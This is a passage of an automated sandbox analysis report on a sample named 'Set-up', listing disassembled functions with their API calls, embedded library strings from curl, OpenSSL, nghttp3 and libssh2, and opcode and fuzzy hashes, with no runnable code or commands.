                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strlen
                          • String ID: %s%s%s$Alt-svc connecting from [%s]%s:%d to [%s]%s:%d$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.$url.c
                          • API String ID: 39653677-4104037097
                          • Opcode ID: e52a33d04c8b4fbfaafa636ecbc76f2779d56de9600e1f67dfa53743a0a0f024
                          • Instruction ID: 05e9708c65f6c5e1da0319d028b460142910825d9f37d16c6bd4347c9ef2db29
                          • Opcode Fuzzy Hash: e52a33d04c8b4fbfaafa636ecbc76f2779d56de9600e1f67dfa53743a0a0f024
                          • Instruction Fuzzy Hash: 3EA105B0A043409FDB28AF14D845B7ABBD6AF86394F08447DFC894B292E736DD41C792
                          APIs
                          • getpeername.WS2_32(?,?,00000080), ref: 00A9A376
                          • WSAGetLastError.WS2_32 ref: 00A9A380
                            • Part of subcall function 00A678B0: closesocket.WS2_32(?), ref: 00A678BB
                            • Part of subcall function 00A9EF30: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000001,?,?), ref: 00A9EF6F
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A9A3D2
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A9A3D6
                          Strings
                          • getpeername() failed with errno %d: %s, xrefs: 00A9A3A0
                          • cf-socket.c, xrefs: 00A9A2E9
                          • accepted_set(sock=%d, remote=%s port=%d), xrefs: 00A9A488
                          • ssrem inet_ntop() failed with errno %d: %s, xrefs: 00A9A3F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _errno$ErrorLastclosesocketgetpeername
                          • String ID: accepted_set(sock=%d, remote=%s port=%d)$cf-socket.c$getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                          • API String ID: 1501154218-2965463112
                          • Opcode ID: b522a765f6c3e56c7876c91a075a0ec32de61dd0823d534ab894314c74456365
                          • Instruction ID: a3e670882274a57956bf393f717fe68bd99925e6693def7f23e417ec1cc73c8a
                          • Opcode Fuzzy Hash: b522a765f6c3e56c7876c91a075a0ec32de61dd0823d534ab894314c74456365
                          • Instruction Fuzzy Hash: 55510731904740ABDB21DF24CC46BE677F4EF91314F048519F95C5B252EB72A985CBD2
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 00B0A5FC
                          • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 00B0A698
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00B0A6BF
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i + 1 < blk->n,nghttp3_ksl.c,0000019B), ref: 00B0A6EB
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK,nghttp3_ksl.c,000001A2), ref: 00B0A700
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assertmemcpy$memmove
                          • String ID: i + 1 < blk->n$lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK$nghttp3_ksl.c
                          • API String ID: 3463011695-2629231663
                          • Opcode ID: 70e6ba715efcddc701f28eec0b264f3cdcdbeff9953be753c50ba11df8daf5bc
                          • Instruction ID: e8dded402ab26ed8f9fac9c270f8b597244a2a8ed6ae80bcc03da8e8812f9477
                          • Opcode Fuzzy Hash: 70e6ba715efcddc701f28eec0b264f3cdcdbeff9953be753c50ba11df8daf5bc
                          • Instruction Fuzzy Hash: F44183756043049FC708EF18D88286ABBE6FF98314F08C96DE8898B356E671ED11DB52
                          APIs
                          • CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 00CA2491
                          • CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 00CA24C6
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00C9F5B4), ref: 00CA2529
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: CertCertificateContextProperty$ErrorLast
                          • String ID: %lX$ERR_CAPI_error$Error code= 0x$engines/e_capi.c$engines/e_capi_err.c
                          • API String ID: 2217977984-837018288
                          • Opcode ID: 963fa51be6e39666315ff15103a23b9f299c38a4146c6163847fad8bca411c83
                          • Instruction ID: 066dc8ec5c8fe88fed1c5cbf73ec56b8b847364a59db47becc7f7ad432d146d7
                          • Opcode Fuzzy Hash: 963fa51be6e39666315ff15103a23b9f299c38a4146c6163847fad8bca411c83
                          • Instruction Fuzzy Hash: 2911E771B80315B7F2203276BC47F6B3A6DEF56F49F044428F948BC1C7E5A7895096A2
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00AB2666
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00AB2699
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00AB26FB
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 00AB273A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$_time64memcpy
                          • String ID: :%u$Shuffling %i addresses$hostip.c
                          • API String ID: 2198566249-1766712111
                          • Opcode ID: 601165af46b2d37e2ac8060d8734863ad663fb739c5dac19e096c92e60cdce35
                          • Instruction ID: 20834ed0e103be2306e936bef13e02eaa1d4f380f0df3e2961481d0a43b9431d
                          • Opcode Fuzzy Hash: 601165af46b2d37e2ac8060d8734863ad663fb739c5dac19e096c92e60cdce35
                          • Instruction Fuzzy Hash: 47A1E0B5A147009FD734DF18C845BAAB7E9EF88314F18842EED8A87343E735E9518B91
                          APIs
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00DE69F1
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000001,00000000,00000000,?,00000009,?), ref: 00DE6A11
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,000000FF,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00DE6A53
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00DE6AB6
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00DE6AC7
                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00DE6ADA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _errno$abortmemcpymemset
                          • String ID: UTF-8
                          • API String ID: 3754757788-243350608
                          • Opcode ID: 5ad62340cb73bd7bd8f142ac643dca753f6d1c93a8b6eeab9c4e58c610d55ec2
                          • Instruction ID: b58be4b55baf927b28d0fc0fa3f7a7b50e42d0809c5eea6a9a6d79311effb079
                          • Opcode Fuzzy Hash: 5ad62340cb73bd7bd8f142ac643dca753f6d1c93a8b6eeab9c4e58c610d55ec2
                          • Instruction Fuzzy Hash: BF41F970A083815FDB11AF66DC95B2B77E5DFA5794F08892CF88987282E631DD04CB72
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A62359
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A62465
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A624AB
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A623EE
                            • Part of subcall function 00A61A54: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A61A70
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: free$abortmallocstrlen
                          • String ID: $ $ $Memory allocation failed for decrypted data.
                          • API String ID: 673139954-1317699236
                          • Opcode ID: 87c772e083e0a951d9afde07152c60ebd192314de98542cab91b0066ab73b2a0
                          • Instruction ID: a51daa775e9b43293f5d58c2ecec627ed07b5aa3007abac5f43dfc5e45228b49
                          • Opcode Fuzzy Hash: 87c772e083e0a951d9afde07152c60ebd192314de98542cab91b0066ab73b2a0
                          • Instruction Fuzzy Hash: E55192B49047099FCB00EFA9C58599EBBF0FF88300F14895AE8989B315E774D9449F92
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00C7E16C
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00C7E17B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strlen
                          • String ID: $ for$:$Ente$crypto/ui/ui_lib.c$er
                          • API String ID: 39653677-1187194756
                          • Opcode ID: 499467355d9e94ce5679c1a25723b35431b96c5f7390ea76e9512144d320e380
                          • Instruction ID: 76c56f37386024383bc0498c5bf98de1d2fc5352b8cfdd4fcd1427e58fb8763a
                          • Opcode Fuzzy Hash: 499467355d9e94ce5679c1a25723b35431b96c5f7390ea76e9512144d320e380
                          • Instruction Fuzzy Hash: 1D21B6F3D052106BD2106A56AC42E6F77ACDD95394F498479FC4C96243F631CA14D3A3
                          APIs
                            • Part of subcall function 00A7D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,00A701B1), ref: 00A7D8E2
                          • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00AA420E,?,?), ref: 00A76350
                          • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00AA420E,?,?,?,?,?,?,?,?,?,00AA420E,?,?), ref: 00A7635B
                          • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00A76369
                          • Sleep.KERNEL32(00000001), ref: 00A763B2
                          • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00A763BC
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00AA420E,?,?), ref: 00A763C7
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00AA420E,?,?), ref: 00A763D6
                            • Part of subcall function 00A7D8C0: GetTickCount.KERNEL32 ref: 00A7D968
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00A763ED
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: free$FileMove_strdup$CountCounterPerformanceQuerySleepTick
                          • String ID:
                          • API String ID: 1793959362-0
                          • Opcode ID: dac26f93b28e857abbf3ac2bc5c89bceeaec32a7d892d7ad5a10803991a0b86b
                          • Instruction ID: 23bfae174ce5ef5cb7a0293d50d1ed02a8a8abab6abf4cd2756574196520b809
                          • Opcode Fuzzy Hash: dac26f93b28e857abbf3ac2bc5c89bceeaec32a7d892d7ad5a10803991a0b86b
                          • Instruction Fuzzy Hash: BA11F3B3D00A4467E7117625AC42BBF7268AF95724F088624FC4C5A282FB25DA94C2A3
                          APIs
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00B4E209
                            • Part of subcall function 00B44620: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000004,?,?,00000000,?,00B51478,?,?,?), ref: 00B44643
                          Strings
                          • Unable to send FXP_REMOVE command, xrefs: 00B4E36B
                          • SFTP Protocol Error, xrefs: 00B4E3AA
                          • Unable to allocate memory for FXP_REMOVE packet, xrefs: 00B4E374
                          • SFTP unlink packet too short, xrefs: 00B4E35A
                          • Error waiting for FXP STATUS, xrefs: 00B4E3BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _time64memcpy
                          • String ID: Error waiting for FXP STATUS$SFTP Protocol Error$SFTP unlink packet too short$Unable to allocate memory for FXP_REMOVE packet$Unable to send FXP_REMOVE command
                          • API String ID: 1622878224-2749593575
                          • Opcode ID: f4a6c85d8ce1d15894491453b5c32468a88f2e7077838226e648cf6f37a713b1
                          • Instruction ID: bbbf85163ad190ec39d9a40bed0ac175ea8d579ce23e5865c2771a7423fed678
                          • Opcode Fuzzy Hash: f4a6c85d8ce1d15894491453b5c32468a88f2e7077838226e648cf6f37a713b1
                          • Instruction Fuzzy Hash: 9451A070904300AFD7219F24DC45B6BBBE8FF40314F1449ADF9AD97292E371EA14AB62
                          APIs
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00A6623A
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A6624D
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00A6627C
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A66389
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$_time64memcpy
                          • String ID: .$hsts.c
                          • API String ID: 2198566249-2242870694
                          • Opcode ID: f326639d605b740515e568402429404fb6dde5df34f684d6828384a11501483d
                          • Instruction ID: e7c99cf55a62219db4f88ddb7037f9d9ee437a6cae80e07a90794e7c7dfb22da
                          • Opcode Fuzzy Hash: f326639d605b740515e568402429404fb6dde5df34f684d6828384a11501483d
                          • Instruction Fuzzy Hash: B241A9F6D183446BEB10BF60AD46B5F37A89F14318F084438FD4E56243FA75E92886A3
                          APIs
